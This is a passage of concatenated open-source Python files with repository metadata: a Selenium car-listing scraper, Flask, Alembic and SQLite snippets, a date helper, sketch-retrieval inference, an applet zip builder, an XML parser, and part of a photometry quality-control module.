        fuel = driver.find_element_by_xpath('//*[@data-aut-id = "value_petrol"]').text
        Fuel.append(fuel)

        transmission = driver.find_element_by_xpath('//*[@data-aut-id = "value_transmission"]').text
        Transmission.append(transmission)

        mileage = driver.find_element_by_xpath('//*[@data-aut-id = "value_mileage"]').text
        Mileage.append(mileage)

        no_owner = driver.find_element_by_xpath('//*[@data-aut-id = "value_first_owner"]').text
        No_owner.append(no_owner)
    # A missing field skips the whole listing (lists stay aligned only
    # because all appends happen after every lookup succeeded).
    except NoSuchElementException:
        pass

# The complete output
# conveting into dict..
dictt = {
    'URL': URL,
    'Company_name': Company_name,
    'prices': prices,
    'Loctaion': Location,
    'Model': Model,
    'Varient': Variant,
    'Year': Year,
    'Fuel': Fuel,
    'Transmission': Transmission,
    'Mileage': Mileage,
    'No_owner': No_owner
}

# saving to data frame using pandas
df2 = pd.DataFrame.from_dict(dictt, orient='index')
# FIX: both lines below referenced an undefined name ``df``; the frame built
# above is ``df2``.
df2 = df2.transpose()

# output file
df2.to_csv('output.csv')
Abdulhaq005/Web-Scraping-scrapy-and-selenium-
cars/spiders/selenium_script.py
selenium_script.py
py
3,645
python
en
code
0
github-code
36
72177063783
import json
import traceback
from flask import Blueprint, jsonify
from bson.json_util import dumps
from models.users import User

get_users_blueprint = Blueprint("get_users_blueprint", __name__)


@get_users_blueprint.route("/get-users")
def get_users():
    """Return every user whose record_status is "ALIVE" as a JSON envelope.

    Response shape: {status_code, status, message, data}, where data is a
    list of plain dicts (one per user). On any failure the traceback is
    printed and a 500-style envelope with an empty data list is returned.
    """
    try:
        users = User.find(User.record_status == "ALIVE").all()
        users_list = []
        for user in users:
            # Each user model iterates as (field_name, value) pairs —
            # TODO confirm against the User model definition.
            user_dict = {}
            for x in user:
                user_dict[x[0]] = x[1]
            users_list.append(user_dict)
        return jsonify({
            "status_code": "200",
            "status": "success",
            "message": "users_retrieved_ok",
            "data": users_list
        })
    # FIX: was a bare ``except:`` which also swallowed SystemExit and
    # KeyboardInterrupt; Exception is the widest class a handler should catch.
    except Exception:
        traceback.print_exc()
        return jsonify({
            "status_code": "500",
            "status": "error",
            "message": "failed_to_retrieve_users",
            "data": [],
        })
emacliam/REDIS-HACKERTHON---CRM
CRM BACKEND/controllers/users/get_users.py
get_users.py
py
947
python
en
code
0
github-code
36
12532422975
"""empty message Revision ID: 8f71e60633a3 Revises: 2e7679aa003d Create Date: 2023-01-24 23:57:44.856118 """ from alembic import op import sqlalchemy as sa from sqlalchemy.dialects import mysql # revision identifiers, used by Alembic. revision = '8f71e60633a3' down_revision = '2e7679aa003d' branch_labels = None depends_on = None def upgrade(): # ### commands auto generated by Alembic - please adjust! ### with op.batch_alter_table('cities', schema=None) as batch_op: batch_op.add_column(sa.Column('ascii', sa.String(length=20), nullable=True)) batch_op.add_column(sa.Column('feat_code', sa.String(length=20), nullable=True)) batch_op.drop_column('ascci') # ### end Alembic commands ### def downgrade(): # ### commands auto generated by Alembic - please adjust! ### with op.batch_alter_table('cities', schema=None) as batch_op: batch_op.add_column(sa.Column('ascci', mysql.VARCHAR(length=20), nullable=True)) batch_op.drop_column('feat_code') batch_op.drop_column('ascii') # ### end Alembic commands ###
lusferror/SugestionCties
src/migrations/versions/8f71e60633a3_.py
8f71e60633a3_.py
py
1,087
python
en
code
0
github-code
36
17393417065
import sqlite3
import constants

DB_NAME = "vehicle_management.db"

# Module-level connection/cursor shared by all Mechanic operations.
db = sqlite3.connect(DB_NAME)
db.row_factory = sqlite3.Row
c = db.cursor()


class Mechanic:
    """A mechanic user: base-user identity plus links into the MECHANIC and
    MECHANIC_SERVICE tables.

    Persistence goes through the module-level ``db``/``c`` handles and the
    SQL template in ``constants.insert_base_user``.
    """

    def __init__(self, user_name, email, phone_number, address, type):
        # ``type`` shadows the builtin but is kept for interface
        # compatibility with existing callers.
        self.user_name = user_name
        self.email = email
        self.phone_number = phone_number
        self.address = address
        self.type = type

    @classmethod
    def save_to_db(cls, username, email, phone_number, address, type):
        """Insert a base-user row, then mirror its id into MECHANIC and
        MECHANIC_SERVICE. Commits once at the end.
        """
        c.execute(constants.insert_base_user, {'user_name': username,
                                               'email': email,
                                               'phone_number': phone_number,
                                               'address': address,
                                               'type': type})
        # Fetch the id of the row we just inserted (single-column row).
        (base_user_id,) = c.execute(
            'SELECT ID FROM BASE_USER WHERE USER_NAME =?', (username,)).fetchone()
        c.execute('INSERT INTO MECHANIC VALUES (?)', (base_user_id,))
        c.execute('INSERT INTO MECHANIC_SERVICE (MECHANIC_ID) VALUES (?)',
                  (base_user_id,))
        # FIX: the original committed three times in a row; a single commit
        # persists all statements of this transaction.
        db.commit()

    @classmethod
    def add_service_to_mechanic_id(cls, service_name, mechanic_id):
        """Point the MECHANIC_SERVICE row ``mechanic_id`` at the service
        named ``service_name``.
        """
        (service_id,) = c.execute('SELECT ID FROM SERVICE WHERE NAME=?',
                                  (service_name,)).fetchone()
        c.execute('UPDATE MECHANIC_SERVICE SET SERVICE_ID =? WHERE ID=?',
                  (service_id, mechanic_id))
        db.commit()
bonevb/HackBulgaria-Programming101-Python-2018
week10/01-Vehicle-Repair-Manager/mechanic.py
mechanic.py
py
1,904
python
en
code
0
github-code
36
69953437863
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# FIX: the coding cookie said gbk while this file is saved as UTF-8, which
# makes CPython refuse to parse it; declared utf-8 instead.
import time


def time_now(time_id):
    """Return a Chinese date/weekday/time sentence for the requested query.

    time_id encodes both the question (date / weekday / time) and the day
    offset: 0/1 today, 2/3 tomorrow, 4/5 day after, 6/7 two days after,
    8/9 yesterday, 10/11 day before, 12/13 two days before (even=date,
    odd=weekday); 14 current time, 15 today's date+weekday, 16 all three.
    Returns None for an unknown id.
    """
    feedback = None
    T = int(time.time())
    # Shift the reference timestamp by whole days according to the query.
    if time_id == 2 or time_id == 3:
        T += 86400
    elif time_id == 4 or time_id == 5:
        T += 172800
    elif time_id == 6 or time_id == 7:
        T += 259200
    elif time_id == 8 or time_id == 9:
        T -= 86400
    elif time_id == 10 or time_id == 11:
        T -= 172800
    elif time_id == 12 or time_id == 13:
        T -= 259200
    # Clock time is always "now" (ids 14/16 never shift T above).
    Time = time.strftime("%H:%M", time.localtime())
    Year = int(time.strftime("%Y", time.localtime(T)))
    Month = int(time.strftime("%m", time.localtime(T)))
    Day = int(time.strftime("%d", time.localtime(T)))
    Week = int(time.strftime("%w", time.localtime(T)))
    Date = "%d年%d月%d日 " % (Year, Month, Day)
    if Week == 0:
        Week = '星期日 '
    elif Week == 1:
        Week = '星期一 '
    elif Week == 2:
        Week = '星期二 '
    elif Week == 3:
        Week = '星期三 '
    elif Week == 4:
        Week = '星期四 '
    elif Week == 5:
        Week = '星期五 '
    elif Week == 6:
        Week = '星期六 '
    if time_id == 0:
        feedback = '今天是' + Date
    elif time_id == 1:
        feedback = '今天是' + Week
    elif time_id == 2:
        feedback = '明天是' + Date
    elif time_id == 3:
        feedback = '明天是' + Week
    elif time_id == 4:
        feedback = '后天是' + Date
    elif time_id == 5:
        feedback = '后天是' + Week
    elif time_id == 6:
        feedback = '大后天是' + Date
    elif time_id == 7:
        feedback = '大后天是' + Week
    elif time_id == 8:
        feedback = '昨天是' + Date
    elif time_id == 9:
        feedback = '昨天是' + Week
    elif time_id == 10:
        feedback = '前天是' + Date
    elif time_id == 11:
        feedback = '前天是' + Week
    elif time_id == 12:
        feedback = '大前天是' + Date
    elif time_id == 13:
        feedback = '大前天是' + Week
    if time_id == 14:
        feedback = '现在时间是' + Time
    elif time_id == 15:
        feedback = '今天是' + Date + Week
    elif time_id == 16:
        feedback = Date + Week + Time
    return feedback


if __name__ == '__main__':
    # FIX: was raw_input (Python 2 only) and the answers were computed but
    # silently discarded; results are now printed.
    # Branch order matters: '大后天' must be tested before '后天', and
    # '大前天' before '前天', since the latter are substrings of the former.
    info = input('我能为你做些什么?')
    if '几号' in info:
        if '今天' in info:
            print(time_now(0))
        elif '明天' in info:
            print(time_now(2))
        elif '大后天' in info:
            print(time_now(6))
        elif '后天' in info:
            print(time_now(4))
        elif '昨天' in info:
            print(time_now(8))
        elif '大前天' in info:
            print(time_now(12))
        elif '前天' in info:
            print(time_now(10))
    elif '星期几' in info:
        if '今天' in info:
            print(time_now(1))
        elif '明天' in info:
            print(time_now(3))
        elif '大后天' in info:
            print(time_now(7))
        elif '后天' in info:
            print(time_now(5))
        elif '昨天' in info:
            print(time_now(9))
        elif '大前天' in info:
            print(time_now(13))
        elif '前天' in info:
            print(time_now(11))
    elif info == '时间' or info == '现在时间':
        print(time_now(14))
    elif info == '日期':
        print(time_now(15))
    elif '时间' in info and '日期' in info:
        print(time_now(16))
Jackeriss/Companions
the_time.py
the_time.py
py
3,041
python
en
code
16
github-code
36
7573894871
from tkinter import *
import math

# ---------------------------- CONSTANTS ------------------------------- #
PINK = "#e2979c"
RED = "#e7305b"
GREEN = "#9bdeac"
YELLOW = "#f7f5dd"
FONT_NAME = "Courier"
WORK_MIN = 25
SHORT_BREAK_MIN = 5
LONG_BREAK_MIN = 20
reps = 0        # completed work/break phases; odd = work, even = break
timer = None    # handle of the pending window.after() callback


# ---------------------------- TIMER RESET ------------------------------- #
def reset_timer():
    """Cancel any running countdown and restore the idle UI state."""
    global reps, timer
    # FIX: reps was never reset, so pressing Start after Reset resumed the
    # previous work/break cycle instead of beginning a fresh one.
    reps = 0
    # FIX: after_cancel(None) raised if Reset was pressed before any Start.
    if timer is not None:
        window.after_cancel(timer)
        timer = None
    check_marks.config(text=" ")
    text1.config(text='Timer')
    canvas.itemconfig(timer_text, text='00:00')


# ---------------------------- TIMER MECHANISM ------------------------------- #
def start_timer():
    """Advance to the next phase: work, short break, or every-4th long break."""
    global reps
    reps += 1
    if reps % 2 != 0:
        text1.config(text='Work')
        count_down(WORK_MIN * 60)
    elif reps % 2 == 0 and reps % 8 != 0:
        text1.config(text='Short Break')
        count_down(SHORT_BREAK_MIN * 60)
    elif reps % 8 == 0:
        text1.config(text='Long Break')
        count_down(LONG_BREAK_MIN * 60)


# ---------------------------- COUNTDOWN MECHANISM ------------------------------- #
def count_down(count):
    """Tick once per second, updating the canvas clock; at zero, start the
    next phase and refresh the checkmark tally (one ✓ per finished work rep).
    """
    global timer
    count_min = math.floor(count / 60)
    count_sec = count % 60
    if count_sec < 10:
        count_sec = f"0{count_sec}"
    if count >= 0:
        canvas.itemconfig(timer_text, text=f'{count_min}:{count_sec}')
        timer = window.after(1000, count_down, count - 1)
    if count == 0:
        start_timer()
        done = ""
        cycle = math.floor(reps / 2)
        for i in range(0, cycle):
            done += '✓'
        check_marks.config(text=done)


# ---------------------------- UI SETUP ------------------------------- #
window = Tk()
window.title('Time Manager')
# Padding keeps the image from occupying all available window space.
window.config(padx=100, pady=50, bg=YELLOW)

# highlightthickness removes the border between the canvas and window.
canvas = Canvas(width=200, height=224, bg=YELLOW, highlightthickness=0)
# NOTE(review): machine-specific absolute path; consider shipping the asset
# relative to this script.
img = PhotoImage(file="C:\\Users\\FACULTY OFFICIAL\\Downloads\\pomodoro-start\\tomato.png")
canvas.create_image(100, 112, image=img)
timer_text = canvas.create_text(103, 130, text='00:00', fill='white',
                                font=(FONT_NAME, 35, 'bold'))
canvas.grid(column=1, row=1)

text1 = Label(text='Timer', font=('ARIAL', 20), fg='green')
text1.grid(row=0, column=1)

start_button = Button(text='Start', command=start_timer)
start_button.grid(row=2, column=0)

reset_button = Button(text='Reset', command=reset_timer)
reset_button.grid(row=2, column=2)

check_marks = Label(fg=GREEN, bg=YELLOW)
check_marks.grid(column=1, row=3)

# FIX: removed stray debug call ``count_down(5)`` which auto-started a 5-second
# countdown (and then a full work session) the moment the app launched.
window.mainloop()
EwezuNgim/The_Shadow_Monarch
Pomodoro_main.py
Pomodoro_main.py
py
2,527
python
en
code
0
github-code
36
29028425647
import json
import os

import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import torch
from torchvision import transforms

from src.constants import (
    DICT_CLASS,
    EMB_ARRAY,
    EMBEDDINGS,
    METADATA,
    NUM_CLOSEST_PLOT,
    NUMBER_RANDOM_IMAGES,
    PREDICTION,
    SKETCHY,
    TUBERLIN,
    QUICKDRAW,
    SKTU,
    SKTUQD,
)
from src.data.loader_factory import load_data
from src.data.utils import default_image_loader, get_loader, get_dict
from src.models.utils import get_model, normalise_attention, get_parameters
from src.models.metrics import get_similarity


class Inference:
    """
    Class to infer closest images of a sketch
    Parent class of
    - PlotInference called from main to plot closest images of random sketch
    - ApiInference called from the api to retrieve the closest images of a
      hand-drawn sketch
    """

    def __init__(self, args):
        """
        Initialises the inference with the trained model and precomputed embeddings
        Args:
        - args: arguments received from the command line (argparse)
        """
        self.args = args
        self.transform = transforms.Compose([transforms.ToTensor()])
        self.loader = default_image_loader

        # Trained image/sketch encoders, frozen for inference.
        self.im_net, self.sk_net = get_model(args, args.load)
        self.im_net.eval()
        self.sk_net.eval()
        torch.set_grad_enabled(False)

        self.prediction_folder = os.path.join(args.save, PREDICTION)
        os.makedirs(self.prediction_folder, exist_ok=True)

        self.embedding_path = os.path.join(args.save, EMBEDDINGS)
        os.makedirs(self.embedding_path, exist_ok=True)

        self.__get_data()

    def __get_processed_images(self):
        """
        Get the data of images to match with the sketches for the dataset
        currently set in self.args.dataset.
        Return:
        - dict_class: dictionnary mapping numbers to classes names
        - paths to the images
        - classes of the images
        - images_embeddings: embeddings of the images
        """
        dict_path = os.path.join(self.embedding_path, self.args.dataset + DICT_CLASS)
        with open(dict_path, "r") as fp:
            dict_class = json.load(fp)

        array_path = os.path.join(
            self.embedding_path, self.args.dataset + "_images" + EMB_ARRAY
        )
        with open(array_path, "rb") as f:
            images_embeddings = np.load(f)

        meta_path = os.path.join(
            self.embedding_path, self.args.dataset + "_images" + METADATA
        )
        df = pd.read_csv(meta_path, sep=" ")

        return dict_class, df["fnames"].values, df["classes"].values, images_embeddings

    def __get_data(self):
        """
        Loads the paths, classes and embeddings of the images of different
        datasets, concatenating them for the combined SKTU / SKTUQD settings.
        """
        dataset = self.args.dataset
        if dataset in [SKETCHY, TUBERLIN, QUICKDRAW]:
            (
                self.dict_class,
                self.images_fnames,
                self.images_classes,
                self.images_embeddings,
            ) = self.__get_processed_images()
            self.sketchy_limit = None
            self.tuberlin_limit = None

        elif dataset in [SKTU, SKTUQD]:
            # Temporarily retarget self.args.dataset to load each sub-dataset;
            # restored at the end of this method.
            self.args.dataset = SKETCHY
            (
                dict_class_sk,
                self.images_fnames,
                self.images_classes,
                self.images_embeddings,
            ) = self.__get_processed_images()
            self.sketchy_limit = len(self.images_fnames)
            self.tuberlin_limit = None

            self.args.dataset = TUBERLIN
            (
                dict_class_tu,
                images_fnames,
                images_classes,
                images_embeddings,
            ) = self.__get_processed_images()

            self.dict_class = [dict_class_sk, dict_class_tu]
            self.images_fnames = np.concatenate(
                (self.images_fnames, images_fnames), axis=0
            )
            self.images_classes = np.concatenate(
                (self.images_classes, images_classes), axis=0
            )
            self.images_embeddings = np.concatenate(
                (self.images_embeddings, images_embeddings), axis=0
            )

            if dataset == SKTUQD:
                self.args.dataset = QUICKDRAW
                self.tuberlin_limit = len(self.images_fnames)
                (
                    dict_class_qd,
                    images_fnames,
                    images_classes,
                    images_embeddings,
                ) = self.__get_processed_images()

                self.dict_class.append(dict_class_qd)
                self.images_fnames = np.concatenate(
                    (self.images_fnames, images_fnames), axis=0
                )
                self.images_classes = np.concatenate(
                    (self.images_classes, images_classes), axis=0
                )
                self.images_embeddings = np.concatenate(
                    (self.images_embeddings, images_embeddings), axis=0
                )
        else:
            raise Exception(self.args.dataset + " not implemented.")

        self.args.dataset = dataset

    def inference_sketch(self, sk):
        """
        Embed a sketch, rank all precomputed image embeddings by similarity,
        and store the NUM_CLOSEST_PLOT+1 closest filenames/labels on self.
        Returns the sketch embedding.
        """
        self.sketch = self.transform(sk).unsqueeze(0)
        if self.args.cuda:
            self.sketch = self.sketch.cuda()

        sketch_embedding, self.attn_sk = self.sk_net(self.sketch)
        if self.args.cuda:
            sketch_embedding = sketch_embedding.cpu()

        similarity = get_similarity(
            sketch_embedding.detach().numpy(), self.images_embeddings
        )
        arg_sorted_sim = (-similarity).argsort()

        self.sorted_fnames = [
            self.images_fnames[i]
            for i in arg_sorted_sim[0][0 : NUM_CLOSEST_PLOT + 1]  # noqa E203
        ]
        self.sorted_labels = [
            self.images_classes[i]
            for i in arg_sorted_sim[0][0 : NUM_CLOSEST_PLOT + 1]  # noqa E203
        ]
        return sketch_embedding

    def get_heatmap(self):
        """ Normalise the attention output of the model for heatmap plots """
        attn_sk = normalise_attention(self.attn_sk, self.sketch)
        self.heat_map = attn_sk.squeeze().cpu().detach().numpy()

    def prepare_image(self, index):
        """ Gets an an image and its label based on its index """
        # The dataset name is encoded in the image path — TODO confirm the
        # 4-levels-up convention holds for all datasets.
        dataset = self.sorted_fnames[index].split("/")[-4]
        loader = get_loader(dataset)
        image = loader(self.sorted_fnames[index])

        dict_class = get_dict(dataset, self.dict_class)
        label = dict_class[str(self.sorted_labels[index])]
        return image, label


class PlotInference(Inference):
    """ Plot inference of a random sketch with its closest images in the latent space"""

    def __init__(self, args, dataset_type):
        # FIX: previously called super().__init__(args, dataset_type), but
        # Inference.__init__ only accepts ``args`` — every instantiation
        # (including main() below) raised TypeError. ``dataset_type`` is kept
        # in the signature for backward compatibility with existing callers.
        super().__init__(args)

    def random_images_inference(self, number_sketches):
        """ Selects number_sketches random sketches and finds the closest images """
        _, _, [test_sk_loader, _], _ = load_data(self.args, self.transform)
        rand_samples_sk = np.random.randint(
            0, high=len(test_sk_loader), size=number_sketches
        )

        for i in range(len(rand_samples_sk)):
            _, sketch_fname, _ = test_sk_loader[rand_samples_sk[i]]
            self.sk = self.loader(sketch_fname)
            self.inference_sketch(self.sk)
            self.get_heatmap()
            self.plot_closest(sketch_fname)

    def plot_closest(self, sketch_fname):
        """
        Plots a sketch with its closest images in the embedding space.
        The images are stored in the same folder as the best model in a
        subfolder called 'predictions'.
        """
        fig, axes = plt.subplots(
            1, NUM_CLOSEST_PLOT + 2, figsize=((NUM_CLOSEST_PLOT + 1) * 4, 8)
        )
        # Panel 0: the raw sketch; panel 1: sketch with attention overlay.
        axes[0].imshow(self.sk)
        axes[0].set(title="Sketch \n Label: " + sketch_fname.split("/")[-2])
        axes[0].axis("off")

        axes[1].imshow(self.sk)
        axes[1].imshow(255 * self.heat_map, alpha=0.7, cmap="Spectral_r")
        axes[1].set(title=sketch_fname.split("/")[-2] + "\n Attention Map")
        axes[1].axis("off")

        for i in range(2, NUM_CLOSEST_PLOT + 2):
            im, label = self.prepare_image(i - 1)
            axes[i].imshow(im)
            axes[i].set(title="Closest image " + str(i) + "\n Label: " + label)
            axes[i].axis("off")

        plt.subplots_adjust(wspace=0.25, hspace=-0.35)
        img_name = "_".join(sketch_fname.split("/")[-2:])
        plt.savefig(os.path.join(self.prediction_folder, img_name))
        plt.close(fig)


def main(args):
    """
    From here, the inference is done on a random sketch and a plot with its
    closest images is made
    """
    inference = PlotInference(args, "test")
    inference.random_images_inference(number_sketches=NUMBER_RANDOM_IMAGES)


if __name__ == "__main__":
    args = get_parameters()
    args.cuda = args.ngpu > 0 and torch.cuda.is_available()
    main(args)
VisiumCH/AMLD-2021-Sketchy
src/models/inference/inference.py
inference.py
py
9,160
python
en
code
0
github-code
36
31987030282
# !/usr/bin/env python
# -*- coding: utf-8 -*-
import contextlib
import os
import zipfile
import os.path
import yaml
import json

# Manifest dicts of every applet that declares a "name"; dumped to
# build/index.json at the end of the run.
applets_index = []


@contextlib.contextmanager
def change_dir(path):
    """Temporarily chdir into *path*, restoring the previous cwd on exit."""
    old_path = os.getcwd()
    os.chdir(path)
    try:
        yield
    finally:
        # FIX: without try/finally, an exception raised inside the with-body
        # left the process stranded in *path* for the rest of the run.
        os.chdir(old_path)


def read_applet_config(applet_path) -> dict:
    """Load and return the applet's manifest.yml as a dict."""
    config_path = os.path.join(applet_path, 'manifest.yml')
    if not os.path.exists(config_path):
        raise Exception(f'{applet_path} not exist manifest.yml')
    with open(config_path, 'r', encoding='utf8') as f:
        # FIX: safe_load returns None for an empty manifest, which crashed the
        # later .get("name") call; normalise to an empty dict.
        return yaml.safe_load(f) or {}


def zip_applet(applet_path, dst_dir):
    """Zip one applet directory (or file) into dst_dir/<name>.zip and record
    its manifest in applets_index when it declares a name.
    """
    dir_path = os.path.dirname(applet_path)
    if not os.path.exists(dst_dir):
        os.makedirs(dst_dir)
        print(f'creat zip build folder: {dst_dir}')

    # Archive entries are written relative to the applet's parent directory.
    with change_dir(dir_path):
        app_config = read_applet_config(applet_path)
        if app_config.get("name"):
            applets_index.append(app_config)

        applet_name = os.path.basename(applet_path)
        zip_name = os.path.join(dst_dir, applet_name + '.zip')
        filelist = []
        if os.path.isfile(applet_path):
            filelist.append(applet_path)
        else:
            for root, dirs, files in os.walk(applet_name):
                for name in files:
                    filelist.append(os.path.join(root, name))

        with zipfile.ZipFile(zip_name, "w", zipfile.ZIP_DEFLATED) as zf:
            for tar in filelist:
                zf.write(tar, tar)
        print(f'zip {applet_name} applet to {zip_name} success')


# Directories that are never treated as applets.
ignore_dirs = ['dist', 'node_modules', 'build', 'venv',
               '.git', '.idea', '.vscode', '__pycache__',
               'demo', 'pip_packages', ]


def zip_all_applets(project_path):
    """Zip every non-ignored subdirectory of project_path into build/."""
    applets_dir = []
    for file in os.listdir(project_path):
        applet_path = os.path.join(project_path, file)
        if not os.path.isdir(applet_path):
            continue
        if file.startswith(".") or file in ignore_dirs:
            continue
        applets_dir.append(applet_path)

    dist_dir = os.path.join(project_path, 'build')
    for applet in applets_dir:
        zip_applet(applet, dist_dir)


def write_index_json(project_path):
    """Dump the collected applet manifests to build/index.json."""
    dst_dir = os.path.join(project_path, 'build')
    with change_dir(dst_dir):
        with open('index.json', 'w', encoding='utf8') as f:
            json.dump(applets_index, f, ensure_ascii=False, indent=4)


def run():
    root_path = os.path.dirname(os.path.abspath(__file__))
    zip_all_applets(root_path)
    write_index_json(root_path)


if __name__ == '__main__':
    run()
jumpserver/applets
build.py
build.py
py
2,560
python
en
code
9
github-code
36
29261172588
import xml.etree.ElementTree as ET


def xml_parse(file_byte):
    """Parse an XML document (str or bytes) into a nested dict structure.

    A childless element maps its tag to '' at the root, or to its text when
    it appears as a child. An element with children maps its tag to a list
    of single-key dicts, one per child, recursing into children that
    themselves have children.
    """

    def get_recursive(parent):
        res = {}
        # FIX: Element.getchildren() was removed in Python 3.9; the element
        # itself supports len() and iteration, which is the supported API.
        if len(parent) == 0:
            res[parent.tag] = ''
            return res
        res[parent.tag] = []
        for child in parent:
            if len(child):
                res[parent.tag].append(get_recursive(child))
            else:
                res[parent.tag].append({child.tag: child.text})
        return res

    root = ET.fromstring(file_byte)
    return get_recursive(root)
oktavianustjoea/ap-app
xml_converter/utils.py
utils.py
py
529
python
en
code
0
github-code
36
35291375172
""" Created on Tue Apr 26 20:17:37 2022 @author: celiaberon """ import os import numpy as np import pandas as pd import scipy from nta.features.select_trials import match_trial_ids from nta.preprocessing.signal_processing import snr_photo_signal def QC_included_trials(ts: pd.DataFrame, trials: pd.DataFrame, allow_discontinuity: bool = False, **kwargs) -> dict: ''' Quality control within sessions to match timeseries and trial dataframes starting and ending trial ID values. Also remove -- remove high timeout blocks. Args: ts: Timeseries containing states and neural data for a single session. trials: Trial data for single session. allow_discontinuity: Whether or not continuous trial structure can be broken. If False, only trials from beginning/end can be excluded. If False, also permits mismatch in trial ids between min and max trial. Returns: trials_matched (dict): {'trials': trial data, 'ts': timeseries data} Contain only identical trial sets. ''' assert ts.session.dropna().nunique() == 1, ( 'multi-session not implemented') assert trials.Session.dropna().nunique() == 1, ( 'multi-session not implemented') trials_ = trials.copy() ts_ = ts.copy() # flag only blocks that don't disrupt photometry timeseries min_trial = trials_.query('~flag_block').nTrial.min() max_trial = trials_.query('~flag_block').nTrial.max() flagged_blocks = (trials_ .query('~nTrial.between(@min_trial, @max_trial)') .nTrial.dropna().values) trials_ = trials_.loc[~trials_.nTrial.isin(flagged_blocks)] # Match min and max trial IDs only (can differ internally but offset will) # be consistent. trials_, ts_ = match_trial_ids(trials_, ts_, allow_discontinuity=allow_discontinuity) return {'trials': trials_, 'ts': ts_} def QC_enl_penalty_rate(trials: pd.DataFrame) -> list: ''' Generate list of sessions satisfying ENL penalty criteria, defined as no greater than 2 std above mean penalty rate in final sessions. Args: trials (pandas.DataFrame): Trial data. 
Returns: qc_sessions (list): Sessions that pass ENLP quality control criteria. ''' trials_ = trials.copy() trials_['penalty'] = trials_['n_ENL'] > 1 trials_['Date'] = pd.to_datetime(trials_['Date'], format='%Y_%m_%d') penalties = (trials_ .sort_values(by='Date') .groupby(['Mouse', 'Date', 'Session'], as_index=False) .penalty.mean()) for mouse, mouse_penalties in penalties.groupby('Mouse'): late_dates = np.sort(mouse_penalties.Date.unique())[-6:] late_sessions = mouse_penalties.query('Date.isin(@late_dates)') late_sessions_mean = np.nanmean(late_sessions['penalty']) late_sessions_std = np.nanstd(late_sessions['penalty']) qc_criteria = late_sessions_mean + (2 * late_sessions_std) penalties.loc[penalties.Mouse == mouse, 'QC_criteria'] = qc_criteria penalties['Pass'] = penalties['penalty'] <= penalties['QC_criteria'] qc_sessions = penalties.query('Pass == True').Session.values return qc_sessions def get_sess_val(trials, trial_variable): val = (trials .groupby('Session') .apply(lambda x: x[trial_variable].unique()) .squeeze().item()) return val def QC_session_performance(trials: pd.DataFrame, ts: pd.DataFrame, update_log: bool = False, **kwargs) -> bool: ''' Filter out sessions that don't meet certain criteria: target_avg_threshold: Proportion of trials to high value port, must exceed side_bias_threshold: Proportion of trials that can favor one side (above/below 0.5) spout_bias_threshold: Proportion of licks to one spout (slightly more inclusive than choice) Args: trials (pandas.DataFrame): Trial data. ts (pandas.DataFrame): Timeseries data. update_log (bool): TRUE if saving .csv overview of session qc stats. filename_suffix (str): Suffix for session log filename. Returns: criteria_met (bool): TRUE if passes quality control. ''' criteria_met = True # Set thresholds for session-level behavioral performance. 
condition_perf_thresh = {9010: 0.7, '9010': 0.7, 8020: 0.6, '8020': 0.6} TARGET_AVG = condition_perf_thresh.get(trials.Condition.unique()[0]) SIDE_BIAS = 0.1 SPOUT_BIAS = 0.15 MIN_TRIALS = 100 # Evaluate spout bias on same trials as trial-level QC (i.e., not # including flagged blocks). trial_ids = trials.nTrial.unique() ts_ = ts.copy().query('nTrial.isin(@trial_ids)') n_valid_trials = (trials .query('flag_block==False & timeout==False')['nTrial'] .nunique()) target_avg = trials.selHigh.mean() if target_avg < TARGET_AVG: criteria_met = False right_avg = trials.direction.mean() if np.abs(right_avg - 0.5) > SIDE_BIAS: criteria_met = False spout_avg = (ts_.query('iSpout.ne(0)') .iSpout.value_counts(normalize=True)[2.]) if np.abs(spout_avg - 0.5) > SPOUT_BIAS: criteria_met = False if n_valid_trials < MIN_TRIALS: criteria_met = False if update_log: enlp_rate = np.mean(trials['n_ENL'] > 1) qc_summary = pd.DataFrame({'Mouse': get_sess_val(trials, 'Mouse'), 'Date': get_sess_val(trials, 'Date'), 'Session': get_sess_val(trials, 'Session'), 'P(right)': round(right_avg, 2), 'P(high)': round(target_avg, 2), 'P(spout)': round(spout_avg, 2), 'N_valid_trials': n_valid_trials, 'enl_penalty_rate': round(enlp_rate, 2), 'Pass': criteria_met}, index=[0]) save_session_log(qc_summary, **kwargs) return criteria_met def load_session_log(path_to_file: str): ''' Load existing session log if it exists, otherwise initialize a new one. Args: path_to_file: Path including filename to try loading in file. Returns: session_log: DataFrame containing session summary quality control stats. logged_sessions: List of sessions already included in session_log. 
''' try: session_log = pd.read_csv(path_to_file, index_col=None) logged_sessions = ['_'.join(sess) for sess in session_log[['Mouse', 'Date']].values] return session_log, logged_sessions except FileNotFoundError: return pd.DataFrame(), [] def save_session_log(sess_qc: pd.DataFrame, fname_suffix: str = 'photometry', root: str = '', **kwargs): ''' Save summary of session quality control metrics. Args: sess_qc: DataFrame containing quality control metrics for single session. filename_suffix: Suffix for session_log filename. Returns: None ''' if not root: root = input('Please provide a path for logging:') filename = f'session_log_{fname_suffix}.csv' path_to_file = os.path.join(root, filename) session_log, logged_sessions = load_session_log(path_to_file) curr_session = f'{sess_qc.Mouse.item()}_{sess_qc.Date.item()}' if curr_session not in logged_sessions: tmp_log = pd.DataFrame({'Mouse': sess_qc['Mouse'].item(), 'Date': sess_qc['Date'].item()}, index=[0]) session_log = pd.concat((session_log, tmp_log)).reset_index(drop=True) if 'N_valid_trials' not in session_log.columns: updated_log = pd.merge(session_log, sess_qc, on=['Mouse', 'Date'], how='left') else: updated_log = session_log.copy() for col in sess_qc.columns.drop(['Mouse', 'Date']): mouse, date, val = sess_qc[['Mouse', 'Date', col]].iloc[0].values idx = updated_log.query('Mouse == @mouse & Date == @date').index updated_log.loc[idx, col] = val updated_log.to_csv(path_to_file, index=False) def QC_photometry_signal(timeseries: pd.DataFrame, mouse: str, session_date: str, ) -> pd.DataFrame: ''' Quality control on signal strength in photometry channels using FFT method. If bilateral signals pass, take delta between right and left. Args: timeseries (pandas.DataFrame): Timeseries data containing photometry signal. mouse (str): Mouse ID. session_date (str): Session ID. pp_style (bool): Deprecated, if changing standardization method for photometry. 
